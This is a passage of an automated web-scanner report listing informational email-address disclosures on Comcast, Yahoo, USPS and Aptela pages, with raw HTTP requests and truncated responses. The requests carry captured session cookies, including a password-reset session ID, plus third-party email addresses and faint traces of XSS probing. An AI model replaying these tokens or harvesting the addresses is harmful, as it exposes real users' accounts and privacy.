<a href="mailto:customerservice@optionshouse.com" target="_blank" title="customerservice@optionshouse.com">customerservice@optionshouse.com</a>
...[SNIP]...

18.7. https://login.comcast.net/myaccount/js/omniture.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/js/omniture.js

Issue detail

The following email address was disclosed in the response:

Request

GET /myaccount/js/omniture.js HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:27 GMT
Server: Apache
Accept-Ranges: bytes
Last-Modified: Tue, 30 Aug 2011 10:28:38 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=494
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 21653

function sTrackSignIn(sPage,sSite,sGuid){ //tracks as a custom link click
   s.linkTrackVars="events,eVar31,eVar32,eVar33,eVar35,eVar36,eVar47,eVar50,prop50";
   s.linkTrackEvents="event28";
   s.events="ev
...[SNIP]...
6=s.mr($8,(vt#Wt`Zvt)`ks.hav()+q+(qs?qs:s.rq(^5)),0,i"
+"d,ta);qs`l;`Rm('t')`5s.p_r)s.p_r(`I`a`l}^I(qs);^Q`u($0;`m$0`b^1,`G$L1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`j''`5s.pg)`H^x@M=`H^xeo=`H^x`Q`r=`H^x`Q^2`l`5!id@Us.tc^ztc=1;s.flush`T()}`3#6`Ctl`0o,t,n,vo`1;s.@M="
+"$Co`I`Q^2=t;s.`Q`r=n;s.t($0}`5pg){`H^xco`0o){`P^t\"_\",1,$a`3$Co)`Cwd^xgs`0u@t`P^tun,1,$a`3s.t()`Cwd^xdc`0u@t`P^tun,$a`3s.t()}}@8=(`H`M`h`9`4$Bs@H0`Id=^
...[SNIP]...

18.8. https://login.comcast.net/static/js/omniture.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /static/js/omniture.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/omniture.js?v=6 HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/login?forceAuthn=1&continue=%2fSecure%2fHome.aspx&s=ccentral-cima&r=comcast.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:24:41 GMT
Server: Apache
Last-Modified: Tue, 30 Aug 2011 14:39:35 GMT
Accept-Ranges: bytes
Cache-Control: max-age=157083293
Expires: Sun, 28 Aug 2016 14:39:35 GMT
Vary: Accept-Encoding
Content-Length: 21653
Keep-Alive: timeout=1, max=347
Connection: Keep-Alive
Content-Type: application/x-javascript

function sTrackSignIn(sPage,sSite,sGuid){ //tracks as a custom link click
   s.linkTrackVars="events,eVar31,eVar32,eVar33,eVar35,eVar36,eVar47,eVar50,prop50";
   s.linkTrackEvents="event28";
   s.events="ev
...[SNIP]...
6=s.mr($8,(vt#Wt`Zvt)`ks.hav()+q+(qs?qs:s.rq(^5)),0,i"
+"d,ta);qs`l;`Rm('t')`5s.p_r)s.p_r(`I`a`l}^I(qs);^Q`u($0;`m$0`b^1,`G$L1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`j''`5s.pg)`H^x@M=`H^xeo=`H^x`Q`r=`H^x`Q^2`l`5!id@Us.tc^ztc=1;s.flush`T()}`3#6`Ctl`0o,t,n,vo`1;s.@M="
+"$Co`I`Q^2=t;s.`Q`r=n;s.t($0}`5pg){`H^xco`0o){`P^t\"_\",1,$a`3$Co)`Cwd^xgs`0u@t`P^tun,1,$a`3s.t()`Cwd^xdc`0u@t`P^tun,$a`3s.t()}}@8=(`H`M`h`9`4$Bs@H0`Id=^
...[SNIP]...

18.9. https://login.yahoo.com/config/login_verify2

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login_verify2

Issue detail

The following email address was disclosed in the response:

Request

GET /config/login_verify2?.src=finance&.intl=us&.done=http://finance.yahoo.com/portfolios/ HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50181


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
<p id='ex'>(e.g. free2rhyme@yahoo.com)</p>
...[SNIP]...

18.10. http://postcalc.usps.gov/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://postcalc.usps.gov
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: postcalc.usps.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 100056
Content-Length: 100056
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:53:06 GMT
Connection: close
Set-Cookie: NSC_fbh-qptudbmdtn_80=ffffffff3b22bf0e45525d5f4f58455e445a4a421548;path=/;httponly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
   Postage P
...[SNIP]...
<a href="mailto:postalexplorer@usps.gov">
...[SNIP]...

18.11. http://sitesearch.comcast.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitesearch.comcast.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?q=isp+email&cat=com&con=www&sec=Customers&PageName=&PageName=Search%2BComcast.com HTTP/1.1
Host: sitesearch.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445&SegmentationMode=TargusA; VISITORID=2086762009; s_sq=%5B%5BB%5D%5D; mbox=session#1315327839174-766376#1315331767|PC#1315327839174-766376.19#1316539507|check#true#1315329967; bn_u=6923713561343025788; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331706445%3B%20gpv_07%3Dcustomercentral%253Ahelp%253Ado%2520i%2520need%2520a%2520separate%2520digital%2520cable%2520box%2520for%2520every%2520tv%253F%253A%2520faq%2520viewer%7C1315331706456%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329907243'%255D%255D%7C1473182707243%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B; fsr.s={"v":1,"pv":9,"lc":{"d0":{"v":9,"s":true,"e":1}},"sd":0,"cp":{"CustomerID":"86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9"}}; fsr.a=1315329910594

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:25:12 GMT
Server: Apache/2.0.52 (Red Hat)
Vary: Accept-Encoding
Content-Length: 44227
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
...[SNIP]...
</b> to corporate_communications@comcast.com and include ...b-roll... in the subject line, or contact: ...
<!--doc_category-->
...[SNIP]...

18.12. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Issue detail

The following email address was disclosed in the response:

Request

GET /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 6
Proxy-Connection: keep-alive
Via: HTTP/1.1 r1.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 291643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tiki Barber remains unemployed and sad - Shutdown Corner - NFL&nbsp;Blog - Yahoo! Spor
...[SNIP]...
<a href="mailto:dfarrar7@earthlink.net">
...[SNIP]...

18.13. http://utdi.reachlocal.net/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /index.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.html HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&rl_key=e2e30c5686d91c3f4971163361e1b86a&kw=233292&dynamic_proxy=1&primary_serv=utdi.reachlocal.net&se_refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone%2Bservice&pub_cr_id=8668759748
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:06 GMT
Server: ConcentricHost-Ashurbanipal/2.0 (Concentric(R))
X-RL-Host: pweb109
X-Robots-Tag: noindex,nofollow
Last-Modified: Wed, 31 Aug 2011 22:29:49 GMT
ETag: "15f966a-5607-4e5eb5dd"
Accept-Ranges: bytes
Content-Type: text/html
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Vary: Accept-Encoding
Content-Length: 22692
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7c45525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:00 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head><meta name="robots" content="noindex,nofollow" />
<meta http-equiv="Content-Type" co
...[SNIP]...
<a href="http://rtsys.rtrk.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&ptt=4&target_email=kheckaman@utdi.com" TARGET="RL_top">
...[SNIP]...
<a href="http://rtsys.rtrk.com/coupon/?scid=2323693&cid=837045&tc=11090604520111271&ptt=4&target_email=info@utdi.com" TARGET="RL_top" class="onbluemenu">info@utdi.com</a>
...[SNIP]...

18.14. http://www.aptela.com/mainstylesheet.css/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /mainstylesheet.css/

Issue detail

The following email address was disclosed in the response:

Request

GET /mainstylesheet.css/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://support.aptela.com:9000/tools/ResetPassword.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326402; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.8.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 12:26:49 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326409; expires=Wed, 05-Sep-2012 12:26:49 GMT; path=/
Vary: Accept-Encoding
Content-Length: 15669
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> Pag
...[SNIP]...
<a href="mailto:info@aptela.com">info@aptela.com</a>
...[SNIP]...

18.15. http://www.aptela.com/misc/privacy-policy/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /misc/privacy-policy/

Issue detail

The following email address was disclosed in the response:

Request

GET /misc/privacy-policy/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; __utma=207344579.967367889.1315327921.1315327921.1315327921.1; __utmc=207344579; __utmz=207344579.1315327921.1.1.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:22 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326382; expires=Wed, 05-Sep-2012 12:26:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fmisc%2F404%2F%22%3Bi%3A2%3Bs%3A31%3A%22%2F33c420cd2ee5ef0c134a240a%2FT2V1%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2F33c420cd2c9d489cd0318b99%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:22 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 20963
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title>Privacy Poli
...[SNIP]...
<a href="mailto:info@aptela.com">info@aptela.com</a>
...[SNIP]...

18.16. http://www.aptela.com/my-account/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/

Issue detail

The following email address was disclosed in the response:

Request

GET /my-account/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/misc/privacy-policy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; exp_last_activity=1315326382; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; WRUID=1480628145.1067928662; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.2.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:28 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326388; expires=Wed, 05-Sep-2012 12:26:28 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:29 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12258
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<title> My Account
...[SNIP]...
<a href="mailto:info@aptela.com">info@aptela.com</a>
...[SNIP]...

18.17. http://www.aptela.com/my-account/login-error/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /my-account/login-error/

Issue detail

The following email address was disclosed in the response:

Request

GET /my-account/login-error/ HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/my-account/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmx=207344579.; __utmxx=207344579.; exp_last_visit=999966382; WRUID=1480628145.1067928662; exp_last_activity=1315326388; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; jkid=None; tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958; tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958; _mkto_trk=id:533-RGZ-601&token:_mch-aptela.com-1315327921949-36615; __utma=207344579.967367889.1315327921.1315327921.1315329987.2; __utmb=207344579.4.10.1315329987; __utmc=207344579; __utmz=207344579.1315329987.2.2.utmcsr=google|utmgclid=CMqnsqPHiKsCFRM2gwodbCP53A|utmccn=phones_business|utmcmd=ppc|utmctr=business_telephone_service

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:26:36 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: exp_last_activity=1315326396; expires=Wed, 05-Sep-2012 12:26:36 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fmy-account%2Flogin-error%2F%22%3Bi%3A1%3Bs%3A12%3A%22%2Fmy-account%2F%22%3Bi%3A2%3Bs%3A21%3A%22%2Fmisc%2Fprivacy-policy%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 06 Sep 2011 12:26:36 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 12464
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


<meta http-equi
...[SNIP]...
<a href="mailto:info@aptela.com">info@aptela.com</a>
...[SNIP]...

18.18. http://www.comcast.com/Movers/Move.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /Movers/Move.cspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Movers/Move.cspx HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerpool_comcastcom_VIP1=3882506052.20480.0000; SC=RC.USID=affb48c8-12df-45e7-aa6c-841fefd17445; UCID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; BIGipServerpool_comcastcom-VIP2=137228613.20480.0000; UserID=86e6f9cd-e501-4b6d-9a3f-1acdcee0e2c9; fsr.s={"v":1,"pv":1,"lc":{"d0":{"v":1,"s":true,"e":1}},"sd":0}; mbox=session#1315327839174-766376#1315331605|check#true#1315329805|PC#1315327839174-766376.19#1316539345; bn_u=6923713561343025788; s_pers=%20s_cpm%3D%255B%255B'Keyword'%252C'1315327839972'%255D%252C%255B'Direct%252520Load'%252C'1315329734689'%255D%255D%7C1473182534689%3B%20s_dfa%3Dcomcastdotcomprod%7C1315331544344%3B%20gpv_07%3Dsearch%2520results%2520-%2520page%25201%7C1315331545589%3B%20s_v5%3D%255B%255B'xss'%252C'1315329734677'%255D%252C%255B'internet%252520phone'%252C'1315329851040'%255D%255D%7C1473182651040%3B; s_sess=%20_dr%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253Dutf-8%2526q%253Dtelephone%252Bservice%3B%20cf%3D0%3B%20c%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20ev41%3Dinternet%2520phone%3B%20stc18%3Dinternet%2520phone%3B%20SC_LINKS%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 54374
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Date: Tue, 06 Sep 2011 12:24:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
   <script type="text
...[SNIP]...
